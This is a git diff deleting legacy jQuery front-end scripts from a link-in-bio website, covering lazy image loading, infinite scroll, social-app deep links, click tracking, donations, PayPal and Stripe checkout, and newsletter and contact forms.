$('#coco_open').on('click', function () { - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_cookieConsentReset', - token: CSFR_TOKEN - } - }); - $('#pb_cookie_consent').removeClass('d-none') - }) -}) -let secureid1 = 0; -if($('#LB_UserID') && $('#LB_UserID').length) { - secureid1 = $('#LB_UserID').val() -} - -const uid = function(){ - return Date.now().toString(36) + Math.random().toString(36).slice(2); -} - -let lkey = 'secure-anonymous-id' -let sid = "" -if (typeof(localStorage) != "undefined" && localStorage) { - sid = localStorage.getItem(lkey); - if(!sid) { - sid = uid() - localStorage.setItem(lkey, sid) - } -} else { - sid = uid() -} - -// $.ajax({ -// url: "/security.json?|{["+location.href.toString()+"]}|{["+document.referrer.toString()+"]}|{["+Math.round(window.screen.width*window.devicePixelRatio)+"x"+Math.round(window.screen.height*window.devicePixelRatio)+"]}|{["+secureid1+"]}|{["+sid+"]}|{["+navigator.language+"]}", -// method: "GET", -// dataType: "json" -// }); - - -if ( - (typeof(window.webkit) != "undefined" && typeof(window.webkit.messageHandlers) != "undefined") || - typeof(JSBridge) != "undefined" -) { - $(document).ajaxComplete(function (event, request, settings) { - let action = extractAction(settings.data) - if (!action) { - return - } - let state = '' - let status = false - try { - state = request.responseJSON.info.state - status = request.responseJSON.status - } catch(error) { - return - } - if (typeof(state) == "undefined" || !state) { - return - } - if (typeof(status) == "undefined" || !status) { - return - } - let info = action+'||'+state - callNativeApp(info); - }); - - function callNativeApp(data) { - try { - window.webkit.messageHandlers["log"].postMessage(JSON.stringify(data)); - } catch (err) { } - try { - JSBridge.showMessageInNative(JSON.stringify(data)); - } catch (err) { } - } - - function extractAction(str) { - try { - var rx = /ACTION=([a-zA-Z-0-9_]+)/g; - var arr = rx.exec(str); - return arr[1]; - } catch(err) { - return ''; - } - } -} - -function isMobileApp() { - if(navigator.userAgent == "LnkBioMobileApp") { - return true; - } - return false -} - -$('.LB_copyButton').on('click', function(e) { - e.preventDefault(); - copyButtonAction($(this)) -}) - -$('.loaded-after-with-action').on('click', '.LB_copyButton', function(e) { - e.preventDefault(); - copyButtonAction($(this)) -}) - -function copyButtonAction(element) { - let input = element.find('input') - let button = element.find('button') - if (!input) { - return - } - var copyText = input[0]; - copyText.select(); - copyText.setSelectionRange(0, 99999); - navigator.clipboard.writeText(copyText.value); - copyText.setSelectionRange(0, 0); - button.text(button.data('copied')) - setTimeout(function() { - button.text(button.data('copy')) - },2500) -} - -$('form.form-loading').on('submit', function(e) { - let btn = $(this).find('button[type="submit"]') - LOADING_BUTTON = btn - btn.find('.spinner-grow').remove() - btn.append('') - DISABLING_BUTTON = btn - setTimeout(function () { - DISABLING_BUTTON.attr("disabled", "disabled") - }, 100) -}) - -$('.modal').on('submit', 'form.form-loading-ajax', function(e) { - let btn = $(this).find('button[type="submit"]') - LOADING_BUTTON = btn - btn.find('.spinner-grow').remove() - btn.append('') - DISABLING_BUTTON = btn - setTimeout(function () { - DISABLING_BUTTON.attr("disabled", "disabled") - }, 100) -}) - -$('.switch-with-actions input[type="checkbox"]').on('change', function(){ - let input = $(this) - let parent = input.parent().parent() - let label = parent.find('span[data-labelon]') - if (input.prop('checked')) { - label.html(label.data('labelon')) - } else { - label.html(label.data('labeloff')) - } -}) - -$('.modal').on('change', '.switch-with-actions input[type="checkbox"]', function(){ - let input = $(this) - let parent = input.parent().parent() - let label = parent.find('span[data-labelon]') - if (input.prop('checked')) { - label.html(label.data('labelon')) - } else { - label.html(label.data('labeloff')) - } -}) - -$('.collapse-faq').on('show.bs.collapse hide.bs.collapse', function (e) { - let card = $(this).parent() - let icon = card.find('.card-title').find('i') - if (e.type == 'show') { - icon.removeClass('fa-chevron-down').addClass('fa-chevron-up') - } else { - icon.removeClass('fa-chevron-up').addClass('fa-chevron-down') - } - footerPositionUpdate() -}) - -$('.collapse-faq').on('shown.bs.collapse hidden.bs.collapse', function (e) { - footerPositionUpdate() -}) - -let initial_selected = '' - -$('.header-menu-container a[data-target="secondmenu"], .header-menu-container span[data-target="secondmenu"]').on('click', function(e) { - e.preventDefault() - let open_id = $(this).data('openmenu') - if ($('.subsection_container[data-sectionid="'+open_id+'"]').hasClass('d-none')) { - if (!initial_selected) { - initial_selected = $($('.selected-top-menu')[0]) - } - $('.selected-top-menu').removeClass('selected-top-menu') - $(this).addClass('selected-top-menu') - $('#navbar-secondary').removeClass('d-none') - $('#navbar-top').addClass('smallnavbar') - $('.subsection_container').addClass('d-none') - $('.subsection_container[data-sectionid="'+open_id+'"]').removeClass('d-none') - } else { - $('.selected-top-menu').removeClass('selected-top-menu') - $(this).removeClass('selected-top-menu') - if (initial_selected) { - initial_selected.addClass('selected-top-menu') - } - - $('#navbar-secondary').addClass('d-none') - $('#navbar-top').removeClass('smallnavbar') - $('.subsection_container').addClass('d-none') - } -}) - -$(window).on('resize scroll', function() { - refreshLazyImages() -}); - -refreshLazyImages() -function refreshLazyImages() { - $('img.lazyload').each(function() { - var el = $(this) - if(!el.visible(true)) - return - if(!el.data('src')) - return - if(el.attr('src') && el.attr('src') != 'data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7') - return; - - el.attr('src',el.data('src')) - }) - $('source.lazyload').each(function() { - var el = $(this) - if(!el.visible(true)) - return - if(!el.data('srcset')) - return - if(el.attr('srcset')) - return; - - el.attr('srcset',el.data('srcset')) - }) - $('.lazyload-bg').each(function() { - var el = $(this) - if(!el.visible(true)) - return - if(!el.data('src')) - return - if(el.css('background-image') && el.css('background-image') != "none" && el.css('background-image').substr(0,3) == "url") - return; - - el.css('background-image','url('+el.data('src')+')') - }) -} - -$('#carouselExampleIndicators').on('slid.bs.carousel', function () { - refreshImages() -}) - -// $('[data-toggle="popover"]').popover() -$('body').on('click', function (e) { - if ($(e.target).data('toggle') !== 'popover' && $(e.target).parent().data('toggle') !== 'popover' - && $(e.target).parents('.popover.in').length === 0) { - try { - $('[data-toggle="popover"]').popover('hide'); - } catch (e) {} - } -}); - -if (typeof(LBDARK) == "undefined") { - LBDARK = 'DARKMODE_AUTO' -} -if (LBDARK == 'DARKMODE_DARK') { - LBDARKMODE = 'DARK' -} else if (LBDARK == 'DARKMODE_LIGHT') { - LBDARKMODE = 'LIGHT' -} else { - if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) { - LBDARKMODE = 'DARK' - } else { - LBDARKMODE = 'LIGHT' - } -} - -function arrayBufferToBase64(buffer) { - let binary = ''; - let bytes = new Uint8Array(buffer); - let len = bytes.byteLength; - for (let i = 0; i < len; i++) { - binary += String.fromCharCode(bytes[i]); - } - return window.btoa(binary); -} - -function base64ToArrayBuffer(base64) { - var binaryString = atob(base64); - var bytes = new Uint8Array(binaryString.length); - for (var i = 0; i < binaryString.length; i++) { - bytes[i] = binaryString.charCodeAt(i); - } - return bytes.buffer; -} - -function LB_utcToTimezone(timestamp) { - var newDate = new Date(); - var ary = timestamp.split(" "); - var ary2 = ary[0].split("-"); - var ary1 = ary[1].split(":"); - ary2[1] = (ary2[1]-1) - - - var newDate = new Date(Date.UTC(ary2[0], ary2[1], ary2[2], ary1[0], ary1[1], ary1[2])); - - return newDate.getFullYear()+ "-" + pad((newDate.getMonth() + 1), 2) + "-" + pad(newDate.getDate(), 2) + " " + pad(newDate.getHours(), 2) + ":" + pad(newDate.getMinutes(), 2) + ":" + pad(newDate.getSeconds(), 2); -} - -var second = 1000 -minute = second * 60 -hour = minute * 60 -day = hour * 24 - - -function LB_Countdown(date, div, intervalid) { - div.removeClass('d-none') - date = LB_utcToTimezone(date) - var countDown = new Date(date).getTime(); - const now = new Date().getTime(), - distance = countDown - now; - - if (distance < 0) { - div.find('.ctn_running').addClass('d-none') - div.find('.ctn_end').removeClass('d-none') - try { - clearInterval(intervalid) - return - } catch (ex) { - return - } - } - - div.find('.ctn_running').removeClass('d-none') - div.find('.ctn_end').addClass('d-none') - if (Math.floor(distance / (day)) > 0) { - div.find('.cnt_d').text(Math.floor(distance / (day))) - } else { - div.find('.cnt_d_cont').addClass('d-none') - } - div.find('.cnt_h').text(Math.floor((distance % (day)) / (hour))) - div.find('.cnt_m').text(Math.floor(Math.floor((distance % (hour)) / (minute)))) - div.find('.cnt_s').text(Math.floor( Math.floor((distance % (minute)) / second))) - - -} - -$('.LB_searchButton').on('keyup', 'input', function() { - let val = $(this).val() - let container = $(this).closest('.LB_searchButton') - let search_container = $('.search-results') - if (val.length > 0) { - container.find('i.fa-times').removeClass('d-none') - search_container.children().each(function() { - let title = $(this).find('span.font-weight-bold').text() - if (title.toLowerCase().indexOf(val.toLowerCase()) == -1) { - $(this).addClass('d-none').removeClass('d-flex').removeClass('d-block') - } else { - $(this).removeClass('d-none').addClass('d-flex') - } - }) - } else { - container.find('i.fa-times').addClass('d-none') - search_container.children().each(function() { - $(this).removeClass('d-none').addClass('d-flex') - }) - } -}) - -$('.LB_searchButton').on('click', 'i.fa-times', function() { - let search_container = $('.search-results') - let container = $(this).closest('.LB_searchButton') - let input = container.find('input') - input.val('') - $(this).addClass('d-none') - search_container.children().each(function() { - $(this).removeClass('d-none').addClass('d-flex') - }) -}) - -$('.modal').on('click', '.selectwithicons-item', function() { - manageDropdownClick($(this)) -}) - -$('.dropdown.selectwithicons').on('click', '.dropdown-item', function() { - manageDropdownClick($(this)) -}) - -function manageDropdownClick(selected) { - let container = selected.closest('.dropdown.selectwithicons') - let button = container.find('button') - let input = container.find('input[type="hidden"]') - - let selectedIconHtml = selected.html(); - let selectedValue = selected.data('value'); - button.html(selectedIconHtml + ' '); - input.val(selectedValue); - let icons = container.closest('.icons') - if (icons) { - let row = container.closest('.row') - let input = row.find('.col > input') - if (input) { - let selectedAdd= selected.data('additional'); - input.attr('placeholder', selectedAdd) - } - } -} - -$('.show-all-features').on('click', function() { - let container = $(this).closest('.card-body') - container.find('.agp-feature-title').removeClass('d-none') - container.find('.agp-feature-subtitle').removeClass('d-none') - $(this).addClass('d-none') -}) \ No newline at end of file diff --git a/old/js/lnkbio.public.js b/old/js/lnkbio.public.js deleted file mode 100644 index f9a2a3a..0000000 --- a/old/js/lnkbio.public.js +++ /dev/null @@ -1,1063 +0,0 @@ -RUNNING_SHAKE = false -IS_FOCUSED = true -jQuery.fn.shake = function (interval, distance, times) { - if (RUNNING_SHAKE || !IS_FOCUSED) - return - RUNNING_SHAKE = true - interval = typeof interval == "undefined" ? 100 : interval; - distance = typeof distance == "undefined" ? 10 : distance; - times = typeof times == "undefined" ? 3 : times; - var jTarget = $(this); - jTarget.css('position', 'relative'); - for (var iter = 0; iter < (times + 1); iter++) { - jTarget.animate({ - top: ((iter % 2 == 0 ? distance : distance * -1)) - }, interval); - } - var ret = jTarget.animate({ - top: 0 - }, interval); - RUNNING_SHAKE = false - return ret -} - -$(window).blur(function () { - IS_FOCUSED = false -}) -$(window).focus(function () { - IS_FOCUSED = true -}) - -$(window).on('resize scroll', function () { - refreshImages() - repositionSlickArrows() -}); - -DEFAULT_SIZE = 1024; -SIZES = [100, 250, 500, 1024]; -setTimeout(function(){refreshImages()}, 250) - - -function refreshImages() { - $('.pb-linkimage img').each(function () { - var el = $(this) - if (!el.visible(true)) - return - if (!el.data('src')) - return - if (el.attr('src')) - return; - - let parent_group = el.closest('.pb-links') - if (parent_group.hasClass('d-none') && parent_group.attr('class').indexOf('group-container-') != -1) { - return; - } - - if ($('#LB_UserID').val() == -1688591) { - var url = el.data('src').replace("-" + DEFAULT_SIZE, "-" + SIZES[3]) - el.attr('src', url) - return - } - - for (i = 0; i < SIZES.length; i++) { - if ((el.width() * 1.2) < SIZES[i]) { - var url = el.data('src').replace("-" + DEFAULT_SIZE, "-" + SIZES[i]) - el.attr('src', url) - return - } - } - el.attr('src', url) = el.data('src') - }) -} - -IS_start = 48; -IS_limit = 48; -if (typeof (HAS_PAGES) == "undefined") { - IS_reachedMax = true; -} else if (HAS_PAGES) { - IS_reachedMax = false; -} else { - IS_reachedMax = true; -} - -IS_done = [0] - -function loadMorePosts() { - if (IS_reachedMax) { - return; - } - if (jQuery.inArray(IS_start, IS_done) !== -1) { - return; - } - if (typeof (NONCE) == "undefined") { - NONCE = "" - } - if (typeof (NONCE_TIME) == "undefined") { - NONCE_TIME = 0 - } - let uniqueid = '' - if ($('#links_container_overall').data('scrollid')) { - uniqueid = $('#links_container_overall').data('scrollid') - } - - IS_done.push(IS_start) - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'PUB_getMoreLinks', - nonce: NONCE, - nonce_time: NONCE_TIME, - start: IS_start, - limit: IS_limit, - user_id: $('#LB_UserID').val(), - uniqueid: uniqueid, - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - for (let group_id in res.info.links) { - let group_links = res.info.links[group_id] - $('div.group-container-'+group_id).append(group_links.join("\n")); - $('div.group-container-'+group_id).removeClass('d-none').addClass('d-flex') - $('h5.group-container-'+group_id).removeClass('d-none').addClass('d-block') - } - refreshImages() - IS_start += IS_limit; - } - if (res.info.reached_max) { - IS_reachedMax = true; - } - if (typeof(res.info.last_link) != "undefined") { - LAST_LINK_ID = res.info.last_link - } - - } - }); -} - -function repositionSlickArrows() { - var difference = Math.round(($(document).width() - $('.maincontainer').width()) / 2); - if (difference > 50) { - difference = difference-40; - } - $('.slick-next').attr('style', 'right:' + difference + 'px !important'); - $('.slick-prev').attr('style', 'left:' + difference + 'px !important'); -} - -$(document).ready(function () { - $(".vibrate").shake(400, 5, 3); - setInterval(function () { - $(".vibrate").shake(400, 5, 3); - }, 4000) -}); - -$(window).scroll(function () { - - if ($(window).width() < 500) { - if ($(document).height() - $(window).height() - $(window).scrollTop() <= 500) { - loadMorePosts(); - } else { - if(typeof(LAST_LINK_ID) != "undefined") { - if ($('#PB_L_'+LAST_LINK_ID).length) { - let last_pos = Math.round($('#PB_L_'+LAST_LINK_ID).position().top-($('#PB_L_'+LAST_LINK_ID).height()+200)) - let window_scroll = Math.round($(window).scrollTop()) - let window_height = Math.round($(window).height()/2) - if (window_scroll+window_height > last_pos) { - loadMorePosts(); - } - } - - } - } - } else { - if ($(document).height() - $(window).height() - $(window).scrollTop() <= 300) { - loadMorePosts(); - } else { - if(typeof(LAST_LINK_ID) != "undefined") { - if ($('#PB_L_'+LAST_LINK_ID).length) { - let last_pos = Math.round($('#PB_L_'+LAST_LINK_ID).position().top-($('#PB_L_'+LAST_LINK_ID).height()+200)) - let window_scroll = Math.round($(window).scrollTop()) - let window_height = Math.round($(window).height()/2) - if (window_scroll+window_height > last_pos) { - loadMorePosts(); - } - } - } - } - } -}); - -$(window).on("beforeunload", function () { - $(window).scrollTop(0); -}); - -function iOSorAndroid() { - var userAgent = navigator.userAgent || navigator.vendor || window.opera; - if (/android/i.test(userAgent)) { - return "AND"; - } - if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) { - return "IOS"; - } - return false; -} -if (typeof (DEEPLINKING_DISABLED) == "undefined") { - DEEPLINKING_DISABLED = false; -} - -if (iOSorAndroid() !== false && !DEEPLINKING_DISABLED) { - $('.deep-links a,a.deep-linking').click(function (e) { - var icon = $(e.target) - if ($(this).hasClass('pb-linkbox')) { - var a = $(this) - } else { - var a = icon.parent() - } - var tracked = a.attr("href") - var url = a.data('url') - var network = a.data('network') - if (network == 'SOCIAL_TW') { // Twitter - var R = new RegExp(/https:\/\/(www\.)?twitter\.com\/([^\/\?]+)/, 'i') - var parts = R.exec(url); - var username = parts[2]; - LB_OpenTwitter(username, url) - } else if (network == 'SOCIAL_FB') { // Facebook - var R = new RegExp(/https:\/\/(www\.)?facebook\.com\/([^\?]+)/, 'i') - var parts = R.exec(url); - var username = parts[2]; - LB_OpenFacebook(username, url) - } else if (network == 'SOCIAL_YT' || network == "MUSIC_YTB" || network == "MUSIC_YTM") { // YouTube - var to_open = url.replace("https://", ""); - to_open = to_open.replace("http://", ""); - LB_OpenYouTube(to_open, url) - } else if (network == 'SOCIAL_SN') { // Snapchat - var R = new RegExp(/https:\/\/(www\.)?snapchat\.com\/add\/([^\/\?]+)/, 'i') - var parts = R.exec(url); - var username = parts[2]; - LB_OpenSnapchat(username, url) - } else if (network == 'SOCIAL_IG') { // Instagram - var R = new RegExp(/https:\/\/(www\.)?instagram\.com\/([^\/\?]+)/, 'i') - var parts = R.exec(url); - var username = parts[2]; - LB_OpenInstagram(username, url) - } else if (network == 'CONTACT_WA') { // Instagram - var R = new RegExp(/http[s]?:\/\/(www\.)?wa\.me\/([^\/\?]+)/, 'i') - var parts = R.exec(url); - var number = parts[2]; - LB_OpenWhatsapp(number, url) - } else - return - - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "IC_track", - url: url, - network: network, - user_id: $('#LB_UserID').val(), - timezone: $('#LB_UserTimezone').val(), - token: CSFR_TOKEN - } - }) - - e.preventDefault(); - }); - - LB_TRACKED_LINK = ''; - LB_TRACKED_TIME = 0; - LB_TRACKED_FUNC = false; - - $(window).blur(function (e) { - if (LB_TRACKED_FUNC) { - clearTimeout(LB_TRACKED_FUNC) - } - }); -} - -function orNormalRedirect(tracked) { - LB_TRACKED_LINK = tracked; - LB_TRACKED_TIME = new Date(); - LB_TRACKED_FUNC = setTimeout(function () { - var current_time = new Date(); - var timeDiff = current_time - LB_TRACKED_TIME; - if (timeDiff < 1000) { - history.pushState(null, null, location.href.toString()); - location.replace(LB_TRACKED_LINK) - } - }, 500); -} - - -function LB_OpenTwitter(username, tracked) { - location.replace("twitter://user/?screen_name=" + username); - orNormalRedirect(tracked) -} - -function LB_OpenFacebook(username, tracked) { - if (iOSorAndroid() == "AND") { - location.href = "fb://facewebmodal/f?href=https://www.facebook.com/"+username; - } - orNormalRedirect(tracked) -} - -function LB_OpenWhatsapp(number, tracked) { - location.href = "whatsapp://send?phone=" + number; - orNormalRedirect(tracked) -} - - - -function LB_OpenYouTube(to_open, tracked) { - if (iOSorAndroid() == "AND") { - location.replace("vnd.youtube://" + to_open); - } else if (iOSorAndroid() == "IOS") { - location.replace("youtube://" + to_open); - } - orNormalRedirect(tracked) -} - -function LB_OpenSnapchat(username, tracked) { - location.href = "snapchat://add/" + username; - orNormalRedirect(tracked) -} - -function LB_OpenInstagram(username, tracked) { - location.href = "instagram://user?username=" + username; - orNormalRedirect(tracked) -} - -function LP_ReloadImg(el) { - el.src = el.src + "&v=" + Math.random(10, 99) -} - -// Donation -$('.pb-supportme').on('click', function () { - $(this).find('.pb-donate-form').slideDown(function () { - footerPositionUpdate() - }) - $('.pb-close').show() - -}) -$('.pb-close').on('click', function () { - var parent = $(this).parent(); - parent.find('.pb-donate-form').slideUp(function () { - footerPositionUpdate() - }) - $(this).hide() - -}) -$('.pb-d-value').on('click', function (e) { - var val = $(this).data('value') - var parent = $(this).parents('.pb-donate-form'); - parent.find('.pb-d-tip').val(val) - parent.find('.pb-d-value').removeClass('btn-outline-paypal') - parent.find('.pb-d-value').addClass('btn-paypal') - $(this).addClass('btn-outline-paypal') - $(this).removeClass('btn-paypal') -}) -$('.pb-d-paypal').on('click', function (e) { - var parent = $(this).parents('.pb-support-parent'); - e.preventDefault() - var val = parent.find('.pb-d-tip').val() - if (val > 0) { - parent.find('.pb-d-value').val(val) - var text = parent.find('.pb-d-message').val() - parent.find('.pb-d-text').val(text); - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "U_addDonation", - eid: $('#LB_UserID').val(), - token: CSFR_TOKEN - } - }) - parent.find('.pb_d_form')[0].submit() - - $('#pb-donate-form').slideUp() - $('.pb-close').hide() - } - return false; -}) - -$('.public-container').on('beforeChange', function (event, slick, currentSlide, nextSlide) { - var container = $('#slick-slide0' + nextSlide) - $('.page-inject').addClass('d-none') - $('.page-inject-' + container.data('page-id')).removeClass("d-none") -}); - - -if ($('#PB_SignupModal').length > 0) { - $('.footer-signup').on('click', function (e) { - e.preventDefault(); - $.getScript("/202006/js/lnkbio.login.js?rand=" + Math.random()); - $('head').append(''); - $.getScript("https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js", function () { - $('#PB_SignupModal').modal('show') - modalIsLoading($('#PB_SignupModal')) - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "PUB_getSignupModal", - ref: $('#LB_UserID').val(), - token: CSFR_TOKEN - }, - success: function (res) { - if (res.status) { - $('#PB_SignupModal').find('.loaded-container').html(res.info.html) - modalHasLoaded($('#PB_SignupModal')) - } - } - }) - }); - }) - $('#PB_SignupModal').find('.close').on('click', function (e) { - $('#PB_SignupModal').removeClass('d-block') - }) - $('#PB_SignupModal').on('click', '.check-consent', function () { - if (checkConsent()) { - modalIsLoading($('#PB_SignupModal')) - if ($(this).data('link')) { - location.href = $(this).data('link') - } else if ($(this).data('next')) { - if ($(this).data('next') == "LN_TwitterRedir") { - LN_TwitterRedir(true) - } - } - } - }); - $('#PB_SignupModal').on('click', '.login-button.fb-signup-btn', function () { - if (checkConsent()) { - FB.login(function (response) { - fbSignup(response); - }, { - scope: 'instagram_basic,pages_show_list,' - }); - } - }); -} - -$('#PB_IconDetailsModal').on('show.bs.modal', function (e) { - let modal = $(this) - modalIsLoading(modal) - $('#icon-copied-button').addClass('d-none') - $('#icon-copy-button').removeClass('d-none') - let icon = $(e.relatedTarget) - $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: "IC_track", - url: icon.data('text'), - network: icon.data('network'), - user_id: $('#LB_UserID').val(), - timezone: $('#LB_UserTimezone').val(), - token: CSFR_TOKEN - } - }) - $('#PB_IconDetailsCopyInput').val(icon.data('text')) - let icon_class = icon.find('i').attr('class').replace('ts-icons-public', '').replace('ts-icons-bigger', '').replace('ts-internaltitle', '').replace('ts-midhuge', '').replace('mt-4', '') - modal.find('.modal-title').html(' ' + icon.data('label')) - modalHasLoaded(modal) -}) - -function copyIcon() { - $('#icon-copied-button').removeClass('d-none') - $('#icon-copy-button').addClass('d-none') - var copyText = document.getElementById("icon-copy-text"); - copyText.select(); - copyText.setSelectionRange(0, 99999); - document.execCommand("copy"); -} - -$('#PB_IconDetailsModal').on('click', '#icon-copy-button', function (e) { - e.preventDefault(); - copyIcon() -}) - -function checkShopModalHeight() { - if((window.innerHeight - 50) < $('#PB_ShopModal').find('.modal-dialog').height()) { - $('#PB_ShopModal').addClass('modal-fullscreen') - $('#PB_ShopModal').find('.modal-header').addClass('modal-header-fullscreen') - $('#PB_ShopModal').data('noslidedown', true); - } else { - $('#PB_ShopModal').removeClass('modal-fullscreen') - $('#PB_ShopModal').find('.modal-header').removeClass('modal-header-fullscreen') - $('#PB_ShopModal').data('noslidedown', false); - } -} - -$('#PB_ShopModal').on('show.bs.modal', function (e) { - $('#PUB_LnkSearchModal').modal('hide') - var btn = $(e.relatedTarget) - var link_id = btn.data('id') - if (!link_id || link_id <= 0) { - return - } - modalIsLoading($('#PB_ShopModal')) - $('#PB_ShopModal').find('input[name="accept_terms"]:not(.accepted_already)').prop("checked", false); - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'LN_getPrice', - link_id: link_id, - user_id: $('#LB_UserID').val(), - token: CSFR_TOKEN - }, - success: function (res) { - modalHasLoaded($('#PB_ShopModal')) - if (res.status) { - $('#PB_ShopTitle').text(res.info.title) - $('#PB_ShopPrice').text(res.info.price_formatted) - $('#PB_ShopButton').data('id', res.info.link_id) - if (res.info.image) { - $('#PB_ShopImg').removeClass("d-none") - $('#PB_ShopImg').attr('src', res.info.image) - $('#PB_ShopImg').on('load', function(){checkShopModalHeight()}) - } else { - $('#PB_ShopImg').addClass("d-none") - } - if (res.info.description) { - $('#PB_ShopDescription').removeClass("d-none") - $('#PB_ShopDescription').text(res.info.description) - } else { - $('#PB_ShopDescription').addClass("d-none") - } - if (!$($('.cc-card')[0]).attr('src')) { - $(".cc-card").each(function () { - $(this).attr('src', $(this).data('src')) - }); - } - if (res.info.has_paypal) { - payPalInit(res.info) - } - if (!res.info.has_stripe) { - $('.PB_Stripe').addClass('d-none') - } - - setTimeout(function() {checkShopModalHeight()}, 200) - } else { - - } - } - }); -}) -ORDER_ID = 0 -ORDER_INFO = {} -function payPalInit(res) { - $('#paypal-button-container').empty() - paypal.Buttons({ - style: { - tagline: false, - color: 'gold', - label: 'pay', - shape: 'pill', - tagline: 'false' - }, - createOrder: function (data, actions) { - return actions.order.create(ORDER_INFO); - }, - onInit: function(data, actions) {}, - onApprove: function(data, actions) { - return actions.order.capture().then(function(details) { - if (typeof(PP_REDIR) != "undefined") { - location.href = PP_REDIR+"&pp-order-id=" + details.id - } else { - location.href = "/shop/thank-you?type=p&pp-order-id=" + details.id - } - }); - }, - onCancel: function (data) { - $('.pr-loading-overlay').removeClass("d-block").addClass('d-none') - $('.pr-loading-spinner').removeClass("d-block").addClass('d-none') - }, - onClick: function (data, actions) { - $('#PB_ShopTermsError').addClass("d-none") - let accept = $('#PB_ShopModal').find('input[name="accept_terms"]') - if (!accept.is(':checked')) { - $('#PB_ShopTermsError').removeClass("d-none") - return false - } - $('.pr-loading').removeClass("d-none").addClass("d-block") - $('.payment-errors').addClass('d-none') - $('.pr-loading-overlay').removeClass('d-none') - $('.pr-loading-spinner').removeClass('d-none') - return $.ajax({ - type: "POST", - url: "/api/", - data: { - ACTION: 'LN_createOrder', - link_id: res.link_id, - user_id: $('#LB_UserID').val(), - token: CSFR_TOKEN, - method: 'paypal' - }, - error: function() { - location.reload() - return actions.reject(); - }, - dataType: "json" - }).then(function (res) { - if (res.status) { - ORDER_ID = res.info.order_id - ORDER_INFO = res.info.pporder - return actions.resolve(); - } else { - $('.pr-loading-overlay').removeClass("d-block").addClass('d-none') - $('.pr-loading-spinner').removeClass("d-block").addClass('d-none') - $('.payment-errors').removeClass('d-none') - $('.payment-errors').html(res.errors[0]) - return actions.reject(); - } - }) - } - - }).render('#paypal-button-container'); -} - -$('#PB_ShopButton,.PB_ShopButton').on('click', function () { - $('#PB_ShopTermsError').addClass("d-none") - let accept = $('#PB_ShopModal').find('input[name="accept_terms"]') - if (!accept.is(':checked')) { - $('#PB_ShopTermsError').removeClass("d-none") - stopLoadingButton() - reEnableButton() - setTimeout(function() { - stopLoadingButton() - reEnableButton() - }, 200) - return - } - var link_id = $('#PB_ShopButton').data('id') - $.getScript('https://js.stripe.com/v3/', function () { - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'LN_createOrder', - link_id: link_id, - user_id: $('#LB_UserID').val(), - token: CSFR_TOKEN - }, - success: function (res) { - stopLoadingButton() - reEnableButton() - if (res.status) { - var stripe = Stripe(_STRIPE_PK, { - stripeAccount: res.info.stripe_account - }); - stripe.redirectToCheckout({ - sessionId: res.info.stripe_session.id - }).then(function (result) {}); - } - } - }); - }); -}); - -$('.modal').on('hide.bs.modal ', function () { - $(this).addClass('faded') - setTimeout(function () { - $(this).removeClass('faded') - }, 2000) -}) - -$('.modal').on('show.bs.modal ', function () { - $(this).removeClass('faded') -}) - -$(function () { - let isMobile = window.matchMedia("only screen and (max-width: 760px)").matches; - if (isMobile) { - try { - $(".modal:not(.modal-fullscreen)").swipe({ - swipeDown: function (event, direction, distance, duration, fingerCount, fingerData) { - if ($(this).data('noslidedown')) { - return; - } - $(this).modal('hide') - } - }); - } catch (err) {} - } -}); - -$('#PB_NewsletterSignupModal').on('show.bs.modal', function() { - $('head').append(''); - modalIsLoading($('#PB_NewsletterSignupModal')) - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'NL_getNewsletterForm', - user_id: $('#LB_UserID').val(), - token: CSFR_TOKEN - }, - success: function (res) { - modalHasLoaded($('#PB_NewsletterSignupModal')); - if (res.status) { - $('#PB_NewsletterSignupModal').find('.loaded-container').html(res.info.html) - } - } - }); -}) - -$('#PB_NewsletterSignupModal,.newsletter-signup').on('submit', 'form[name="newsletter_signup"]', function(e) { - e.preventDefault() - let post = $(this).serializeObject() - post.ACTION = 'NL_signup' - post.user_id = $('#LB_UserID').val() - post.token = CSFR_TOKEN - let form = $(this) - form.find('.alert').addClass('d-none') - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - pass: {form: form}, - data: post, - success: function (res) { - stopLoadingButton() - reEnableButton() - let form = this.pass.form; - if (res.status) { - form.find('.alert-success').removeClass('d-none') - } else { - form.find('.alert-danger').removeClass('d-none') - form.find('.alert-danger').html(res.errors[0]) - } - } - }); - return false; -}); - -$('#PB_ContactFormModal,.contactform').on('submit', 'form[name="contact_form"]', function(e) { - e.preventDefault() - let post = $(this).serializeObject() - post.ACTION = 'NL_contact' - post.user_id = $('#LB_UserID').val() - post.token = CSFR_TOKEN - if ($('#g-recaptcha-response').length && $('#g-recaptcha-response').val()) { - post.captcha = $('#g-recaptcha-response').val() - } - let form = $(this) - form.find('.alert').addClass('d-none') - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - pass: {form: form}, - data: post, - success: function (res) { - stopLoadingButton() - reEnableButton() - let form = this.pass.form; - if (res.status) { - form.find('.alert-success').removeClass('d-none') - } else { - form.find('.alert-danger').removeClass('d-none') - form.find('.alert-danger').html(res.errors[0]) - } - } - }); - return false; -}); - - -$('#PB_ContactFormModal').on('show.bs.modal', function() { - $('head').append(''); - modalIsLoading($('#PB_ContactFormModal')) - $.ajax({ - url: "/api/", - method: "POST", - dataType: "json", - data: { - ACTION: 'NL_getContactForm', - user_id: $('#LB_UserID').val(), - token: CSFR_TOKEN - }, - success: function (res) { - modalHasLoaded($('#PB_ContactFormModal')); - if (res.status) { - $('#PB_ContactFormModal').find('.loaded-container').html(res.info.html) - if (res.info.captcha) { - $('body').append(""); - } - } - } - }); -}) - -$('#PB_ShareModal').on('show.bs.modal', function(e) { - if (navigator.share) { - 